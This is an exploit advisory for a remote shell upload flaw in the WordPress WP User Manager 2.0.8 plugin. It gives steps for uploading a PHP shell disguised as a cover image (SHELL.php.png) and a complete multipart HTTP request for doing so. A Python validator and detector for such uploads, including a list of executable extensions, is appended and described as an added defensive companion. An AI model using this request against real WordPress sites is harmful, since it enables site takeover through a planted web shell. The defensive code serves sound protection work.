WordPress WP User Manager plugin version 2.0.8 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 5, 2019
# Vendor Homepage: https://wpusermanager.com
# Software Link : https://wordpress.org/plugins/wp-user-manager/
# Tested Version: 2.0.8
# Tested on: Kali Linux, Windows 8.1 / WordPress 4.9.8
# Note: The free edition is vulnerable; other editions may also be affected.
# PoC:
# 1.- Log in to the site and go to your profile settings.
# 2.- In the profile cover image section, you can upload your shell by appending an image extension to the end of the shell filename (ex: SHELL.php.png).
# 3.- Click on "Update Profile".
# The uploaded shell is then stored at /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png
# PoC request (headers and multipart body):
POST /wordpress/?page_id=214&updated=success HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/?page_id=214&updated=success
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842
Content-Length: 2142
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"
Content-Type: image/jpeg
{{"SHELL CONTENT"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_email"
{{"Email"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_firstname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_lastname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_nickname"
root
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_displayname"
display_nickname
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_website"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_description"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="wpum_form"
profile
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="step"
0
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="account_update_nonce"
df63baa04c
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/?page_id=214&updated=success
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="submit_account"
Update profile
-----------------------------1794372498243154061698264842--
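A defensive companion to the advisory above, added here and not part of the original write-up: a Python validator that refuses cover-image uploads carrying an executable extension anywhere in the filename chain (the SHELL.php.png pattern) and checks the image magic bytes, plus a scan over constructed upload paths of the kind the advisory names. The extension lists are assumptions and should be aligned with the web server's handler configuration.

```python
import os

# Assumed list of extensions a PHP-capable web server may execute when they appear
# anywhere in the filename chain (e.g. Apache with AddHandler / mod_mime multi-ext).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc"}
ALLOWED_IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}

# Magic-byte prefixes for the allowed image types.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed sample of stored upload paths, matching the location the advisory names.
SAMPLE_UPLOADS = [
    "/wp-content/uploads/wp-user-manager-uploads/2019/02/avatar.png",
    "/wp-content/uploads/wp-user-manager-uploads/2019/02/SHELL.php.png",
    "/wp-content/uploads/wp-user-manager-uploads/2019/02/photo.jpeg",
]


def all_extensions(filename):
    """Every dotted suffix of the basename, lower-cased: 'SHELL.php.png' -> ['php', 'png']."""
    parts = os.path.basename(filename).lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def is_safe_upload(filename, content):
    """Accept only if no executable extension appears in the chain, the final
    extension is an allowed image type, and the bytes start with that type's magic."""
    exts = all_extensions(filename)
    if not exts or any(e in EXECUTABLE_EXTS for e in exts):
        return False  # SHELL.php.png is refused regardless of its final extension
    final = exts[-1]
    if final not in ALLOWED_IMAGE_EXTS:
        return False
    return content.startswith(MAGIC[final])  # rejects PHP text named cover.png


def find_suspicious_uploads(paths):
    """Detection side: flag stored paths with an executable extension anywhere in the chain."""
    return [p for p in paths if any(e in EXECUTABLE_EXTS for e in all_extensions(p))]


if __name__ == "__main__":
    print(is_safe_upload("SHELL.php.png", MAGIC["png"] + b"\x00"))  # False
    print(find_suspicious_uploads(SAMPLE_UPLOADS))
```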